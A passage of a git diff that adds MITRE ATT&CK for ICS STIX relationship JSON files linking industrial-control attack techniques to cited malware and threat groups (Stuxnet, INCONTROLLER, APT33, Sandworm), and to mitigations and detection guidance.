Devices. Retrieved September 28, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-103a" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:17:08.493Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can remotely send commands to a malicious agent uploaded on Omron PLCs over HTTP or HTTPS.(Citation: CISA-AA22-103A) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0d540b53-6a5d-4f56-9dee-47707443b149.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0d540b53-6a5d-4f56-9dee-47707443b149.json new file mode 100644 index 0000000000000000000000000000000000000000..6fc2474ad857aa28c8f34107f6a6599026b422fa --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0d540b53-6a5d-4f56-9dee-47707443b149.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--3e1707d1-792b-4529-92ba-64dbdecdf633", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0d540b53-6a5d-4f56-9dee-47707443b149", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-30T16:00:14.208Z", + "description": "Monitor ICS automation network protocols for functions related to reading an operational process state (e.g., \u201cRead\u201d function codes in protocols like DNP3 or Modbus). In some cases, there may be multiple ways to monitor an operational process\u2019 state, one of which is typically used in the operational environment. Monitor for the operating mode being checked in unexpected ways.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0df0cb6d-0067-48b2-a33e-495415713ab7.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0df0cb6d-0067-48b2-a33e-495415713ab7.json new file mode 100644 index 0000000000000000000000000000000000000000..7d8f6efc8db343744606b995f944736a69752595 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0df0cb6d-0067-48b2-a33e-495415713ab7.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--82b72886-9aac-4f86-bb29-e0c077cc3f34", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0df0cb6d-0067-48b2-a33e-495415713ab7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.181Z", + "relationship_type": "mitigates", + "description": "Protocols used for device management should authenticate all network messages to prevent unauthorized system changes.\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0e275c19-7688-47f8-8cd5-85eaacec465b.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0e275c19-7688-47f8-8cd5-85eaacec465b.json new file mode 100644 index 0000000000000000000000000000000000000000..43a1af09440e49e4dfe27e9eeaf740e5f589cec0 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0e275c19-7688-47f8-8cd5-85eaacec465b.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--187cf899-c568-4d19-893f-ba07e72ba4e5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0e275c19-7688-47f8-8cd5-85eaacec465b", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:34:04.450Z", + "description": "Monitor industrial process history data for events that correspond with command message functions, such as setpoint modification or changes to system status for key devices. This will not directly detect the technique\u2019s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0e29f62d-4ffc-47ec-9623-72f874fbe905.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0e29f62d-4ffc-47ec-9623-72f874fbe905.json new file mode 100644 index 0000000000000000000000000000000000000000..4d27e2852b64353119c1d33501280624cb0d2849 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0e29f62d-4ffc-47ec-9623-72f874fbe905.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--1136b512-c87a-4db5-9064-4d49b3873b96", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0e29f62d-4ffc-47ec-9623-72f874fbe905", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:09:52.454Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) renames s7otbxdx.dll, a dll responsible for handling communications with a PLC. It replaces this dll file with its own version that allows it to intercept any calls that are made to access the PLC. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0e4f272b-d744-4feb-9f3f-c24c3598538f.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0e4f272b-d744-4feb-9f3f-c24c3598538f.json new file mode 100644 index 0000000000000000000000000000000000000000..efaae62d7326479c65c9b2997210332ac4102646 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0e4f272b-d744-4feb-9f3f-c24c3598538f.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--a44425d5-051b-4687-bd67-26156d532e38", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0e4f272b-d744-4feb-9f3f-c24c3598538f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.202Z", + "relationship_type": "mitigates", + "description": "Ensure proper registry permissions are in place to inhibit adversaries from disabling or interfering with critical services.\n", + "source_ref": "course-of-action--3222a807-521b-4a1a-aa13-f1cda45734b3", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0eb112f6-c1cb-4843-93f5-f668aa0e9bd8.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0eb112f6-c1cb-4843-93f5-f668aa0e9bd8.json new file mode 100644 index 0000000000000000000000000000000000000000..7223064cadbe0293e338d6adb4e403dd79c4a324 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0eb112f6-c1cb-4843-93f5-f668aa0e9bd8.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--7ff135ab-7a89-4dc7-b21c-9822246eed0e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0eb112f6-c1cb-4843-93f5-f668aa0e9bd8", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos", + "description": "Dragos Allanite Retrieved. 2019/10/27 ", + "url": "https://dragos.com/resource/allanite/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:40:08.649Z", + "description": "[ALLANITE](https://attack.mitre.org/groups/G1000) utilized credentials collected through phishing and watering hole attacks. (Citation: Dragos)", + "relationship_type": "uses", + "source_ref": "intrusion-set--190242d7-73fc-4738-af68-20162f7a5aae", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0f18b876-b698-4f70-aa98-50e8b5a7eae2.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0f18b876-b698-4f70-aa98-50e8b5a7eae2.json new file mode 100644 index 0000000000000000000000000000000000000000..40a4a9c2268831fd1f8be141f3120e35bd155cb9 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0f18b876-b698-4f70-aa98-50e8b5a7eae2.json @@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--a97c0772-126c-4632-a1c6-eb243efbda51", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0f18b876-b698-4f70-aa98-50e8b5a7eae2", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Andy Greenburg June 2019", + "description": "Andy Greenburg 2019, June 20 Iranian Hackers Launch a New US-Targeted Campaign as Tensions Mount Retrieved. 2020/01/03 ", + "url": "https://www.wired.com/story/iran-hackers-us-phishing-tensions/" + }, + { + "source_name": "Jacqueline O'Leary et al. September 2017", + "description": "Jacqueline O'Leary et al. 2017, September 20 Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware Retrieved. 2019/12/02 ", + "url": "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:41:49.943Z", + "description": "[APT33](https://attack.mitre.org/groups/G0064) sent spear phishing emails containing links to HTML application files, which were embedded with malicious code. (Citation: Jacqueline O'Leary et al. September 2017) [APT33](https://attack.mitre.org/groups/G0064) has conducted targeted spear phishing campaigns against U.S. government agencies and private sector companies. (Citation: Andy Greenburg June 2019)", + "relationship_type": "uses", + "source_ref": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0f8a6c14-1050-404a-bb6e-4fe107d5b6cd.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0f8a6c14-1050-404a-bb6e-4fe107d5b6cd.json new file mode 100644 index 0000000000000000000000000000000000000000..3637bb10733669329566ca8906a76f99853a3f2e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0f8a6c14-1050-404a-bb6e-4fe107d5b6cd.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--ddc7ecab-bedc-4620-a9f5-0602cb6eccb5", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0f8a6c14-1050-404a-bb6e-4fe107d5b6cd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.197Z", + "relationship_type": "mitigates", + "description": "Devices should authenticate all messages between master and outstation assets.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0ff88ef7-44fd-4307-b381-2e0bc76ce83b.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0ff88ef7-44fd-4307-b381-2e0bc76ce83b.json new file mode 100644 index 0000000000000000000000000000000000000000..fc85ee9462963fecf8f2f064ba00120be28ab78a --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0ff88ef7-44fd-4307-b381-2e0bc76ce83b.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--865a3da6-f6f2-4e58-b7c8-3624b7563072", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0ff88ef7-44fd-4307-b381-2e0bc76ce83b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.209Z", + "relationship_type": "mitigates", + "description": "Ensure proper network segmentation between higher level corporate resources and the control process environment.\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0ffdee1a-1e83-4506-aba2-38c55812abb3.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0ffdee1a-1e83-4506-aba2-38c55812abb3.json new file mode 100644 index 0000000000000000000000000000000000000000..6a89c4dabb01a9cdc9aa926ad9778ef68768eda9 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0ffdee1a-1e83-4506-aba2-38c55812abb3.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--e6d88503-cddd-4191-8f43-e6857fa66b4c", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0ffdee1a-1e83-4506-aba2-38c55812abb3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.137Z", + "relationship_type": "mitigates", + "description": "Ensure that all SIS are segmented from operational networks to prevent them from being targeted by additional adversarial behavior.\n", + "source_ref": "course-of-action--da44255d-85c5-492c-baf3-ee823d44f848", + "target_ref": "attack-pattern--5fa00fdd-4a55-4191-94a0-564181d7fec2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--10626671-941d-4a82-a835-56059058ef87.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--10626671-941d-4a82-a835-56059058ef87.json new file mode 100644 index 0000000000000000000000000000000000000000..d4d5c925ce264be713178bba34e7df9debf6b4b3 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--10626671-941d-4a82-a835-56059058ef87.json @@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--a563d843-f2ad-4cf0-ae33-12465503f7ed", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--10626671-941d-4a82-a835-56059058ef87", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.065Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--107d9a23-991b-44f5-97f6-7f6983c7013a.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--107d9a23-991b-44f5-97f6-7f6983c7013a.json new file mode 100644 index 0000000000000000000000000000000000000000..c9e0af25087ae2e5dd111092912144f39d67e6c4 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--107d9a23-991b-44f5-97f6-7f6983c7013a.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--20ef456c-f89d-4a58-aa62-4c21fdc5659e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--107d9a23-991b-44f5-97f6-7f6983c7013a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.099Z", + "relationship_type": "mitigates", + "description": "Authenticate connections from software and devices to prevent unauthorized systems from accessing protected management functions.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--10e3816e-8ee2-4dcf-81b7-a22ec0b6fda5.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--10e3816e-8ee2-4dcf-81b7-a22ec0b6fda5.json new file mode 100644 index 0000000000000000000000000000000000000000..ef2a2101607f4a3698ab0e39db340ae2028c7f54 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--10e3816e-8ee2-4dcf-81b7-a22ec0b6fda5.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--cb112fa2-e3fb-44f7-b5aa-949c0959e942", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--10e3816e-8ee2-4dcf-81b7-a22ec0b6fda5", + "created": "2021-04-11T14:06:54.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "UNITED STATES DISTRICT COURT WESTERN DISTRICT OF PENNSYLVANIA October 2020", + "description": "UNITED STATES DISTRICT COURT WESTERN DISTRICT OF PENNSYLVANIA 2020, October 15 Indictment: Conspiracy to Commit an Offense Against the United States Retrieved. 2021/04/07 ", + "url": "https://www.justice.gov/opa/press-release/file/1328521/download" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:53:50.448Z", + "description": "In the Ukraine 2015 incident, [Sandworm Team](https://attack.mitre.org/groups/G0034) sent spearphishing attachments to three energy distribution companies containing malware to gain access to victim systems. (Citation: UNITED STATES DISTRICT COURT WESTERN DISTRICT OF PENNSYLVANIA October 2020)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--10e87e4b-a231-42e3-a011-0031f8226936.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--10e87e4b-a231-42e3-a011-0031f8226936.json new file mode 100644 index 0000000000000000000000000000000000000000..d85151cd92ab10ef59f5fb013bddda82aac00381 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--10e87e4b-a231-42e3-a011-0031f8226936.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--00e3dc40-34fb-459d-b620-14e4578ad00c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--10e87e4b-a231-42e3-a011-0031f8226936", + "created": "2022-09-26T17:15:51.819Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T17:15:51.819Z", + "description": "Monitor for firmware changes which may be observable via operational alarms from devices.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1110814e-81ff-4a23-9988-4b93e6f68a2b.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1110814e-81ff-4a23-9988-4b93e6f68a2b.json new file mode 100644 index 0000000000000000000000000000000000000000..47cd60a255163725353b8837daa62e2728d0c3cc --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1110814e-81ff-4a23-9988-4b93e6f68a2b.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--0f65c7c2-9297-495e-96e4-c8af77047efa", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1110814e-81ff-4a23-9988-4b93e6f68a2b", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:09:35.145Z", + "description": "Monitor asset alarms which may help identify a loss of communications. Consider correlating alarms with other data sources that indicate traffic has been blocked, such as network traffic. In cases where alternative methods of communicating with outstations exist alarms may still be visible even if reporting messages are blocked. ", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e", + "target_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--111f437a-c67d-40e4-9515-7e9b22e65eff.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--111f437a-c67d-40e4-9515-7e9b22e65eff.json new file mode 100644 index 0000000000000000000000000000000000000000..e0b1f0eb297fc607b2fd1366b5aa2bfc7e6419e6 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--111f437a-c67d-40e4-9515-7e9b22e65eff.json @@ -0,0 +1,41 @@ +{ + "type": "bundle", + "id": "bundle--ab60f407-cf6f-40cb-821d-b6d4946d1ca4", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--111f437a-c67d-40e4-9515-7e9b22e65eff", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.234Z", + "relationship_type": "mitigates", + "description": "Audit domain and local accounts and their permission levels routinely to look for situations that could allow an adversary to gain system wide access with stolen privileged account credentials. (Citation: Microsoft May 2017) (Citation: Microsoft August 2018)These audits should also identify if default accounts have been enabled, or if new local accounts are created that have not be authorized. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft February 2019)\n", + "source_ref": "course-of-action--622fe4d4-0e8e-4d17-9c25-6c9cef1f15d5", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "external_references": [ + { + "source_name": "Microsoft May 2017", + "description": "Microsoft 2017, May Attractive Accounts for Credential Theft Retrieved. 2020/09/25 ", + "url": "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/attractive-accounts-for-credential-theft" + }, + { + "source_name": "Microsoft August 2018", + "description": "Microsoft 2018, August Implementing Least-Privilege Administrative Models Retrieved. 2020/09/25 ", + "url": "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/implementing-least-privilege-administrative-models" + }, + { + "source_name": "Microsoft February 2019", + "description": "Microsoft 2019, February Active Directory administrative tier model Retrieved. 2020/09/25 ", + "url": "https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#a-nameesaebmaesae-administrative-forest-design-approach" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--11ab5b1a-b7b3-43bb-bc19-d65bf4ed89f3.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--11ab5b1a-b7b3-43bb-bc19-d65bf4ed89f3.json new file mode 100644 index 0000000000000000000000000000000000000000..986a4306c665a099401cb09d1380762f4f58b018 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--11ab5b1a-b7b3-43bb-bc19-d65bf4ed89f3.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--69423f15-2d3f-42cc-8232-fd18a22bc1c2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--11ab5b1a-b7b3-43bb-bc19-d65bf4ed89f3", + "created": 